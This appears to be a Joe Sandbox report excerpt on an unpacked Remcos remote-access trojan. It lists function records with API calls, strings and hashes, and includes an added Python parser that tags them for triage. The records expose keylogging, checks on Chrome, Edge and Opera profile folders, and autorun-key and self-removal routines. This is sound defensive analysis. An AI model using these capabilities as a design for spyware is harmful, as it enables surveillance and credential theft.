                                                                                                                                                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocaleValid
                                                                                                                                                                    • String ID: IsValidLocaleName$JD
                                                                                                                                                                    • API String ID: 1901932003-2234456777
                                                                                                                                                                    • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                                                                                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                                                                                                                    • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                                                                                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                    • API String ID: 1174141254-4188645398
                                                                                                                                                                    • Opcode ID: 1be31c3d09ddb0bbaec834815553409634896179868bb1db145055bbc5a9ba63
                                                                                                                                                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                                                                                                                    • Opcode Fuzzy Hash: 1be31c3d09ddb0bbaec834815553409634896179868bb1db145055bbc5a9ba63
                                                                                                                                                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                    • API String ID: 1174141254-2800177040
                                                                                                                                                                    • Opcode ID: 20274c63270a20d3158dbeafeaac512f2e8c3b95a24c8d70e3b0729698767f80
                                                                                                                                                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                                                                                                                    • Opcode Fuzzy Hash: 20274c63270a20d3158dbeafeaac512f2e8c3b95a24c8d70e3b0729698767f80
                                                                                                                                                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                    • API String ID: 1174141254-1629609700
                                                                                                                                                                    • Opcode ID: b3b91882f06e0c799b00c6ad1b5b2d0b23f3320a6a7ace62f467a88fe309f294
                                                                                                                                                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                                                                                                                    • Opcode Fuzzy Hash: b3b91882f06e0c799b00c6ad1b5b2d0b23f3320a6a7ace62f467a88fe309f294
                                                                                                                                                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
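
Each record above lists, for one function recovered from the unpacked Remcos image, the Windows APIs it calls (with the call site and any subcall), the strings it references, the memory dump the code came from, and a set of opcode and instruction hashes. The triage signals worth pulling out are the API sets (UnhookWindowsHookEx next to the string "Online Keylogger Stopped"; GetKeyState, GetKeyboardState and ToUnicodeEx; waveInPrepareHeader and waveInAddBuffer; PathFileExistsW against the Chrome, Edge and Opera profile paths) and the page protection of the region each function was dumped from. The Python below is an added example written for this page, not Joe Sandbox code: it parses records in the layout shown above (three of them copied into a constructed sample), decodes the .sdmp file name and tags each function by behaviour. Assumptions: the .sdmp name fields are read as PID, dump number, dump id, base address, page protection, an unknown field, memory type, an unknown field (an order inferred from the names on this page; the PAGE_* and MEM_* values are the documented Windows constants), '$' separates the entries of the String ID field, and the indicator tables are the example's own, not a Joe Sandbox signature set.

```python
"""Parse the Joe Sandbox function records above (APIs / Memory Dump Source /
Similarity) into structured data and tag the behaviour each API set indicates.
Added example for this page, not Joe Sandbox code; assumptions are commented."""
import re

# Constructed sample: three records copied from the report, cut down to the
# lines the parser consumes. Raw string, so the backslashes in paths are literal.
SAMPLE = r"""
APIs
• UnhookWindowsHookEx.USER32 ref: 0040B0C7
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: Online Keylogger Stopped
Uniqueness Score: -1.00%

APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: UserProfile$\AppData\Local\Google\Chrome\

APIs
• GetKeyState.USER32(00000011), ref: 0040B64B
  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: [AltL]$[AltR]
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+): )?(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(r"Source File: (?P<name>\S+?\.sdmp), Offset: (?P<offset>[0-9A-F]+)")

# Documented Windows constants (winnt.h); the low byte of a protection value is the
# access right, PAGE_GUARD/PAGE_NOCACHE modifiers sit above it.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# Indicator tables for this example (assumption, not a Joe Sandbox signature set).
KEYLOG_APIS = {"SetWindowsHookExA", "SetWindowsHookExW", "UnhookWindowsHookEx", "GetKeyState",
               "GetAsyncKeyState", "GetKeyboardState", "ToUnicodeEx"}
AUDIO_APIS = {"waveInOpen", "waveInPrepareHeader", "waveInAddBuffer", "waveInStart"}
BROWSER_MARKERS = ("\\Google\\Chrome\\", "\\Microsoft\\Edge\\", "\\Opera Software\\")

def parse_sdmp_name(name):
    """Decode an .sdmp file name. Field order is an assumption inferred from the names on
    this page: pid.dump_no.dump_id.base.protect.<unknown>.mem_type.<unknown>."""
    fields = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name}")
    protect, mem_type = int(fields[4], 16), int(fields[6], 16)
    return {"pid": int(fields[0], 16), "dump_no": int(fields[1], 16), "dump_id": fields[2],
            "base": int(fields[3], 16),
            "protect": PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:X}"),
            "mem_type": MEM_TYPE.get(mem_type, f"0x{mem_type:X}")}

def parse_report(text):
    """Split report text into records, one per 'APIs' heading; other headings are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "strings": [], "source": None}
            records.append(cur)
        elif cur is None:
            continue
        elif m := API_RE.match(line):
            cur["apis"].append({"name": m["name"], "module": m["module"], "ref": m["ref"],
                                "args": m["args"] or "", "parent": m["parent"]})
        elif m := SRC_RE.search(line):
            cur["source"] = parse_sdmp_name(m["name"]) | {"offset": int(m["offset"], 16)}
        elif line.startswith("• String ID: "):
            cur["strings"] = line[len("• String ID: "):].split("$")  # '$' joins entries (assumption)
    return records

def classify(record):
    """Tag a record by its API set, referenced strings and the protection of its source region."""
    names = {a["name"] for a in record["apis"]}
    blob = " ".join([a["args"] for a in record["apis"]] + record["strings"])
    tags = set()
    if names & KEYLOG_APIS or any("keylogger" in s.lower() for s in record["strings"]):
        tags.add("keylogging")
    if names & AUDIO_APIS:
        tags.add("audio_capture")
    if "PathFileExistsW" in names and any(mk in blob for mk in BROWSER_MARKERS):
        tags.add("browser_profile_probe")
    if record["source"] and record["source"]["protect"] == "PAGE_EXECUTE_READWRITE":
        tags.add("rwx_region")  # code dumped from writable+executable memory: unpacked or injected
    return tags

def summarize(text):
    """One triage row per record, keyed by the ref of its first top-level API call."""
    return [{"ref": r["apis"][0]["ref"] if r["apis"] else None,
             "apis": [a["name"] for a in r["apis"]], "tags": sorted(classify(r))}
            for r in parse_report(text)]
```

summarize(SAMPLE) returns one row per record with its API names and tags. Every record here carries rwx_region because the code was dumped from PAGE_EXECUTE_READWRITE private memory at 0x400000 rather than from a mapped image, which is consistent with the unpacking and process-hollowing signatures listed at the top of the report; a function tagged keylogging or browser_profile_probe out of such a region is the one to open first in the disassembler.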

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                                                                                                                                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                                                                                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                                                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                                                                                    • API String ID: 2738857842-2658077756
                                                                                                                                                                    • Opcode ID: ebf392733fa6af1cef2b299d24dcfaafd055ccf9a66db9e14e7d9e277e57d489
                                                                                                                                                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                                                                                                                    • Opcode Fuzzy Hash: ebf392733fa6af1cef2b299d24dcfaafd055ccf9a66db9e14e7d9e277e57d489
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: uD
                                                                                                                                                                    • API String ID: 0-2547262877
                                                                                                                                                                    • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                                                                                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                                                                                                                    • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                                                                                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,274C6C7C,?), ref: 274C6A1E
                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,274C6C7C,?), ref: 274C6A35
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: |lL'
                                                                                                                                                                    • API String ID: 0-3097904926
                                                                                                                                                                    • Opcode ID: bc11d9a75014ed6c73289b128c654a07cd060c5a7f6931c09d08aa0260bdd657
                                                                                                                                                                    • Instruction ID: c748252fe306db054a8230c6c135034916fcbbe4225172bd68e5fb44f03fc9e7
                                                                                                                                                                    • Opcode Fuzzy Hash: bc11d9a75014ed6c73289b128c654a07cd060c5a7f6931c09d08aa0260bdd657
                                                                                                                                                                    • Instruction Fuzzy Hash: D7F04974804509CBDB00DB68C449BEC77B0FB42339F28875CE4788A2D6DB7A9986CB42
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                    • String ID: !D@$open
                                                                                                                                                                    • API String ID: 587946157-1586967515
                                                                                                                                                                    • Opcode ID: 94ae01d4d8b7264207e9bd3f4e7ba97e74bef168960cfc99b3f8e3eceb9b28ff
                                                                                                                                                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                                                                                                                    • Opcode Fuzzy Hash: 94ae01d4d8b7264207e9bd3f4e7ba97e74bef168960cfc99b3f8e3eceb9b28ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: State
                                                                                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                                                                                    • Opcode ID: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                                                                                                                                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                                                                                                                    • Opcode Fuzzy Hash: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                                    • String ID: ,kG$0kG
                                                                                                                                                                    • API String ID: 1881088180-2015055088
                                                                                                                                                                    • Opcode ID: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                                                                                                                                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                                                                                                                    • Opcode Fuzzy Hash: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                                                                                                                                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                                                                                                                                                    Strings
                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteOpenValue
                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                    • API String ID: 2654517830-1051519024
                                                                                                                                                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                                                                                                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
• Opcode ID: cbeb5e690985b75f7686d3fc5d6754269001ae0680a5a222a39347c6f772a563
• Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
• Opcode Fuzzy Hash: cbeb5e690985b75f7686d3fc5d6754269001ae0680a5a222a39347c6f772a563
• Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
• WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
• Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
• Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
• Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
• Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CountInfoInputLastTick
• String ID: NG
• API String ID: 3478931382-1651712548
• Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
• Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
• Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
• Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
• GetLastError.KERNEL32 ref: 00440D35
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
